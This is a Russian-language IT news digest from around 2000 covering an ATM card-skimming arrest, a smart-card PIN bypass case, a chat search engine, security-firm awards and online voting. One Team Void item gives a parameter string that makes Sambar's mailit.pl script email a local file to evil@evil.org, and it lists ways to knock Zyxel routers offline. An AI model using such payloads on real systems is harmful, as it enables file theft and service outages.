Новости:

В Брюсселе арестован россиянин, подделывавший банковские карточки

В минувшие выходные в Брюсселе был задержан российский компьютерщик, подделывавший банковские магнитные карточки, сообщает РИА "Новости".

В ходе обычной ночной проверки патруль брюссельской полиции обнаружил в одной из автомашин, разъезжавших по центру города, значительное количество банковских магнитных карточек. Допрошенный водитель Олег Д., оказавшийся бывшим росийским специалистом по информационным технологиям, признался, что разработал систему, позволяющую подделывать банковские карточки.

Мошенник успел испытать свое изобретение на практике. Как выяснилось, в Испании он уже попадался с поличным и провел около полугода в тюрьме.

Олег, по его словам, придерживается некоего "кодекса чести" - он никогда не "вычищал" счета своих жертв до конца. "Я брал только необходимое на жизнь", - заявил на допросе воспитанник российской высшей школы.

Все тонкости пиратского изобретения пока неизвестны, но основные его принципы россиянину пришлось изложить полиции. Мошенник сконструировал миниатюрный сканнер, считывающий информацию с банковских магнитных карточек. Сканнер вставлялся в банкомат. Ничего не подозревающий очередной клиент набирал код доступа к своему счету, получал некую сумму и уходил. Затем следивший за ним на расстоянии мошеннник извлекал устройство из банкомата и переписывал информацию на чистую пластиковую карту. Он также использовал миниатюрную видеокамеру, которая размещалась рядом с банкоматом - с помощью нее можно было снять набор пароля карточки.

Проживающий ныне в Париже Олег Д. приехал на "гастроли" в Брюссель в минувшую пятницу. При нем было обнаружено около 40 магнитных карточек, являвшихся копиями банковских карточек на счета французских вкладчиков. Полицейские решили проверить на практике эффективность изобретения и без труда сняли в ближайшем банкомате по одной из карточек деньги с французского счета.

Copyright (C) Lenta.ru

ChatScan - находка для шпиона

Компания eNow объявила о создании поисковой системы для интернет-чатов, которая позволит любому пользователю моментально узнать, где в Сети ведутся разговоры на интересующую его тему.

Программа ChatScan будет архивировать, структурировать и осуществлять поиск по чатам примерно так же, как DejaNews работает с конференциями Usenet. Идентифицировав тысячи чатов, разбросанных по всему Интернету, ChatScan поставит наблюдать за ними своих агентов с элементами искусственного интеллекта. Эти программы будут отслеживать наиболее активные дискуссии и сохранять их, попутно разбивая на категории. Скажем, дискуссия о шоколаде попадет в раздел "еда", и так далее.

Пользователь, запустивший у себя ChatScan, сможет при помощи этой системы выбирать интересующую его дискуссию по директориям. Либо осуществлять поиск текущей дискуссии по ключевым словам: например, получив ключевое слово "щенок", клиент выдаст все чаты, в которых собачья тема обсуждалась в течение последних пяти минут.

По мнению разработчиков, подобная программа должна значительно облегчить жизнь пользователям, которым приходится то сидеть в пустом чате, то наоборот, продираться сквозь чаты, набитые бессмысленными разговорами тинейджеров.

Правда, очевидно также, что метод ключевых слов будет быстро уловлен теми, кто захочет привлечь в свой чат побольше народу - он просто будет время от времени вбрасывать в чат популярные ключевые слова. Кроме того, как указывает Salon.com, возможности такой искалки будут наверняка использоваться и "Большим братом" вроде ФБР. А педофилам будет значительно легче отыскивать в чатах маленьких девочек.

Однако разработчики поисковой системы для чатов уверяют, что их самих беспокоят вопросы сохранения тайны личности, и к этому они приняли определенные меры. В частности, ChatScan не будет подслушивать приватные чаты, чаты с паролями, а также чаты "один на один".

Тем не менее, даже многие открытые чаты, вокруг которых уже сформировались сообщества "своих", тоже не очень-то будут рады наплыву чужаков после запуска ChatScan. Кроме того, сама природа интернетовских "болталок" будет нарушена, когда все будут знать, что их разговоры прослушиваются и архивируются для дальшейшего анализа.

Copyright (C) Lenta.ru 

$2000 каждые 15 минут

Андрей Кононович

В пятницу к 10-месячному заключению с отсрочкой исполнения был приговорен 36-летний французский компьютерный инженер Серж Хампич (Serge Humpich), сумевший обмануть внутреннюю систему платежей французских банков Cartes Bancaires.

Изготовленная им дома смарт-карта всегда говорила банкомату, что был введен правильный PIN-код, независимо от того, что набирал Хампич. Это позволяло ему снимать по 15.000 франков ($2.238) каждые 15 минут и покупать все, чего только могла пожелать его душа.

Впрочем, Хампич решил не наживаться на своем открытии, а попытался продать свою схему взлома алгоритма обратно Cartes Bancaires. Те его щедрости не оценили, а вместо этого поставили в известность Министерство внутренних дел. В сентябре прошлого года его арестовали, автоматически он потерял и свое рабочее место. Теперь ему остается только вспоминать о хорошо проведенных днях и проклинать свою честность - если бы он не захотел поставить в известность Cartes Bancaires об изобретенном им методе обмана банкоматов, то смог бы жить на широкую ногу в течение достаточно длительного срока. Этот срок ему теперь придется отбыть в тюрьме.

Copyright (C) Компьютерра

APACHE 1.3.12, Zyxel DoS, SAMBAR & CGI

ВЫШЕЛ APACHE 1.3.12 Apache 1.3.12: Была выпущена новая версия популярного httpd. В ней ликвидирована возможность того самого cross-scripting, применяемого, к примеру, системой tx3. Большая опасность этого - возможность подстановки собственных данных в страницу, которая передаe:тся через SSL-соединение. Путe:м несложной передачи данных как параметра методом GET своему скрипту атакующий легко может получить содержимое страницы.

Подробная документация CERT находится по адресу : http://www.cert.org/advisories/CA-2000-02.html.

Уязвимости роутеров:

Роутеры ISDN RH348 и RT328, а так же ZyxelP128imh подвержены DoS, которое может быть осуществлено большим количеством различных способов. При SYN-сканировании роутера он перестаe:т отвечать на соединения в течении 5 минут. Естественно, можно и нужно запускать nmap c опцией -S ;)

При простом соединении с портом 23 никто более не может подсоединиться к роутеру, даже если вы не прошли аутенификацию.

При получении большого количества ICMP-редиректов роутер перестанет выполнять свои функции и требует около 30 секунд на восстановление.

Для ликвидации уязвимостей требуется установить в Access Control List'e только вашу станцию, и запретить соединения с других.

Очередная уязвимость в httpd sambar. Скрипт /cgi-bin/mailit.pl, стоящий на данном сервере по умолчанию, позволяет читать файлы с диска системы, на которой стоит этот сервер: этот скрипт является системой отправки почты, и передача скрипту параметров можно заставить сервер отправлять данные кому-либо на почту.

server=smtp.example.com&
from=root@example.com&
recipient=evil@evil.org&
subject=Hi&body=Hello+World%0
A&attach=c:\autoexec.bat

 duke

Copyright (C) Team Void

Российская компания в области безопасности получает награду
европейского уровня

На прошедшем в Брюсселе ISS Partner Summit 2000 НИП "Информзащита" было удостоено награды "За выдающиеся достижения в области технических решений"

Научно-инженерное предприятие (НИП) "ИНФОРМЗАЩИТА" (http://www.infosec.ru) на прошедшей 15-18 февраля в Брюсселе конференции (ISS Partner Summit 2000) было удостоено почетной награды "За выдающиеся достижения в области технических решений" ("Most outstanding technical implementation").

В работе данной конференции принимало участие 114 партнеров компании Internet Security Systems, Inc. (ISS), предлагающих ее решения в Европе, на Ближнем и Среднем Востоке и в Африке. НИП "Информзащита", являясь единственным партнером компании ISS в России и СНГ, представило свой подход в области адаптивной безопасности, использующий продукты и услуги компании ISS.

Полученная награда является свидетельством высочайшего уровня технической поддержки продукции компании Internet Security Systems, осуществляемой НИП "ИНФОРМЗАЩИТА". За три года сотрудничества была проделана большая работа по продвижению в России и странах СНГ решений в области анализа защищенности, обнаружения атак и управления безопасностью. Первым шагом, сделанным на пути к получению награды "За выдающиеся достижения в области технических решений", явилась локализация системы анализа защищенности Internet Scanner и ее сертификация в Государственной Технической Комиссии при Президенте РФ (сертификат 195 от 2 сентября 1998 г.).

Следующим шагом стала русификация системы обнаружения атак на уровне сети и операционной системы RealSecure. И, наконец, в мае 1999 года НИП "ИНФОРМЗАЩИТА" получило статус авторизованного учебного центра (Authorized Training Center, ATC) компании Internet Security Systems. В настоящий момент таких центров во всем мире всего 21. Помимо этого, НИП "ИНФОРМЗАЩИТА" предлагает своим клиентам и партнерам услуги по техническому сопровождению, консалтингу, аудиту и анализу защищенности с использованием всего спектра продуктов компании ISS, входящих в семейство средств адаптивного управления безопасностью SAFEsuite.

В июне 1999 года НИП "ИНФОРМЗАЩИТА" была анонсирована технология управления информационной безопасностью "Беркут". В рамках этой технологии реализуется централизованное управление всеми продуктами компании ISS:

• Системами анализа защищенности на уровне сети, операционной системы, баз данных и прикладного программного обеспечения Internet Scanner, System Scanner и Database Scanner.

• Системой обнаружения атак RealSecure и ее компонентами, работающими на уровнях сети (RealSecure Network Engine) и операционной системы (RealSecure System Agent).

Эта работа также помогла сделать компании Internet Security Systems выбор победителя в пользу НИП "ИНФОРМЗАЩИТА".

Copyright (C) InfoArt News Agency

НИП "Информзащита" получает сертификат Гостехкомиссии России на систему защиты информации "Secret Net 4.0"

НИП "Информзащита" объявило о получении сертификата N 302 на систему защиты информации (СЗИ) "Secret Net 4.0", выданного Государственной Технической Комиссией при Президенте Российской Федерации.

Как сообщается СЗИ "Secret Net 4.0", разработанная НИП "Информзащита", обеспечивает надежную защиту от несанкционированного доступа к информации на автономных ПЭВМ и рабочих станциях ЛВС под управлением ОС Windows 95/98 и соответствует 3 классу защищенности для средств вычислительной техники. СЗИ "Secret Net 4.0" может применяться для защиты информации, составляющей как коммерческую, так и государственную тайну.

В ближайшее время НИП "Информзащита" собирается завершить сертификацию целого ряда продуктов: "Secret Net - Сервер безопасности 4.0", "Secret Net 4.0" (клиент Сервера безопасности), "Secret Net NT 4.0", "Secret Net Unix 4.0".

Кроме того, в планах НИП "Информзащита" стоит выпуск новых продуктов - криптографических шлюзов "Континент-С" и "Континент-К", а также системы криптографической защиты для СЗИ "Secret Net", реализованных по технологии управления информационной безопасностью "Беркут".

Copyright (C) InfoArt News Agency

Primaries в Аризоне будут электронными

Андрей Кононович

Министерство юстиции США разрешило Демократической партии Аризоны использовать онлайновое голосование при проведении "праймариз" (предварительных президентских выборов) 11 марта. Естественно, такое решение не могло не вызвать возражений: во-первых, были опасения, что такой метод голосования будет дискриминационным по отношению к бедным слоям населения, не имеющим выхода в Сеть. Но демократы пообещали устроить в бедных районах на 29 избирательных участков больше, чем было на выборах 1996 года, и сумели убедить министерство в серьезности своих намерений (правда, на этой неделе им еще придется проявить все свое красноречие, чтобы суметь склонить на свою сторону по этому вопросу и совет из трех судей). Во-вторых, не обошлось и без боязни хакеров. Здесь уже придется поработать техническим специалистам партии и работникам компании Election.com, предоставившей всю программную базу для проведения такого голосования. Так или иначе, но разрешение было получено, и во время мартовских "праймариз" демократов в Аризоне будет использоваться и Сеть.

Всего в Аризоне зарегистрировано 843 тысячи членов Демократической партии. Однако они проявляют достаточно слабую избирательную активность - во время "праймариз" 1996 года за своего кандидата пришло проголосовать только 13 тысяч человек. Организаторы предварительных выборов этого года надеются, что использование Интернета, а также более активная агитационная кампания позволит им поднять эту цифру до 50 тысяч человек.

Copyright (C) Компьютерра

MP3 - уже не бесплатно

Андрей Кононович

Молодая компания EverAd, похоже, поставила себе целью преодолеть отвращение RIAA и других представителей музыкальной индустрии к формату MP3. Она предлагает программу, которая показывает рекламные баннеры во время прослушивания MP3 файлов.

В середине марта должен открыться музыкальный сайт компании - PlayJ, на котором будет представлен широкий выбор MP3 для скачивания по каталогу компании Orchid. В настоящее время EverAd уже подписала соглашения с более чем 200 рекламодателей. При этом во время раскрутки своей бизнес-модели она не станет брать ни цента за показ рекламных баннеров.

Казалось бы, что здесь такого - очередной плейер с окошком для баннеров. Ан нет. EverAd действительно использует традиционные решения от DoubleClick для показа баннеров и Netgravity для генерации отчетов, но дает рекламодателю гораздо большую свободу выбора. Система регистрирует, какие песни прокручиваются и как долго слушает их пользователь. Рекламодатель может выбрать в качестве музыкального сопровождения для своих баннеров как одну-единственную песню, так и все творения определенного автора. А может и подобрать себе музыкальную "смесь" по вкусу. При прослушивании музыки на экране у меломана всегда будет висеть баннер. А если включится скринсейвер, то программа от EverAd автоматически выключит музыку. Баннеры показываются, даже если пользователь в данный момент не подключен к Интернету. Короче говоря, это очень похоже на идеальное решение для тех, кто делает на музыке деньги.

Осталась только одна проблема - хакеры, которые, несомненно, выпустят кряк и к этой программе. Если программисты EverAd смогут справиться с угрозой взлома, то, возможно, мы получим первое решение для распространения и прослушивания MP3, которое не вызовет гнева RIAA и других власть предержащих в музыкальной индустрии.

Copyright (C) Компьютерра

Обновлен сервер "Проекта - Inroad"

Обзор рынка и комментарии к нему
Как заткнуть уши Большому брату
                    <<Фото>>

Последние новости
Cкоро будут на www.inroad.kiev.ua :-)

Беспроводный доступ в Интернет
предоставлен  фирмой  InterStrada